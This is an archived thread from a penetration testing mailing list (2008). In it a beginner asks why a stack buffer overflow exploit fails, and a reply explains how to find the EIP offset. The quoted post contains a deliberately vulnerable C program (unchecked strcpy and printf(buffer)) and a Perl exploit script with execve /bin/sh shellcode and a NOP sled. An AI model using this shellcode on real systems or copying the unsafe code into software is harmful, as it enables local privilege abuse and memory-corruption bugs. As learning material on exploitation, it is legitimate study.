Home page logo
/

pen-test logo Penetration Testing mailing list archives

Re: Simple Buffer Overflow
From: "Sanjay R" <2sanjayr () gmail com>
Date: Mon, 14 Jan 2008 09:27:38 +0530

Hi:
before writing your exploit code, you should check the length of the
buffer that will overwrite EIP. As you mentioned that u r a beginner
(like me!!), I advise you to always follow step-by-step approach. Once
you gain expertise, play with it as much as you like. so..u need to
do..
1. pass a randomely large string (1000 chars, with unique 4 chars group)
2. On getting segmentation fault, see the address in GDB
3. Since we have taken the unique substrings on leanght 4, you will be
able to find the substring (4 chars that overwrite the EIP). Count the
chars.
4. Now write your exploit code.

-sanjay

On 10 Jan 2008 02:09:46 -0000,  <loki6 () orange nl> wrote:
Hi there and thank you for reading this,


I'm new in the pen-test area and want to study a simple buffer overflow exploit on debian 2.6.18-5-686.


As I've said I'm new to this field and my goal is to be able to anticipate on possible buffer overflow exploits.


I've created this simple script: "test.c" :


[code]


#include <stdio.h>


int main(int argc, char **argv){


 char buffer[256];


 if (argc == 1) {

 printf("Usage: %s (input)", argv[0]);

 }


 strcpy(buffer, argv[1]);

 printf(buffer);


return 0;

}


[/code]




Then I'm trying to exploit it with:





[code]


#!/usr/bin/perl


$ret = "/x90/x9a/xbf";


$shellcode = "\xb0\x0b".

      "\x99".

      "\x52".

      "\x68\x2f\x2f\x73\x68".

      "\x68\x2f\x62\x69\x6e".

      "\x89\xe3".

      "\x52".

      "\x53".

      "\x89\xe1".

      "\xcd\x80";



$exploit = "\x90" x 235;

$exploit .= $shellcode;

$exploit .= $ret;


system("./a.out $exploit");


[/code]



The shellcode is an execve /bin/sh.

When I run the perl script it simply returns my bash prompt. So the exploit didn't work.


When I type 'exit' afterwards, I'm dropped from my su shell I was in previously, confirming there isn't a "/bin/sh" 
process.


Now the funny thing is when I overflow the buffer of a.out in gdb, with:



  run `perl -e 'print "A"x262'`

Program received signal SIGSEGV, Segmentation fault

0x08048412 in main ()


It doesn't overflow the EIP, because when I use:

  i r


It says:


eip    0x8048412     0x8048412  <main+126>



The first time I tried today it overflowed the EIP correctly and I didn't change anything.


ECX is 0x41414141 and

ESP is 0x4141413d

EBP is 0xbf004141


Since stack and frame pointer both have 41 in them I figure part of them is overflowed. Why not the Extended 
Instruction Pointer?


I was wondering if someone was able to help me with this, because I really want to get the hang of this.


I don't know if I got the NOP sled and return address right either, because when using GDB:



   x/s $esp


I get:


0x4141413d:   <Address 0x4141413d out of bounds


I'm kinda stuck from there.


My problem in short:


- How do I get a reliable return address with GDB

- How do I determine the length of the NOP sled

- How do I test shellcode



Thanks for reading this..

Thanks for any help, pointers and advice.


ironmonkey6

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------





-- 
Computer Security Learner

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault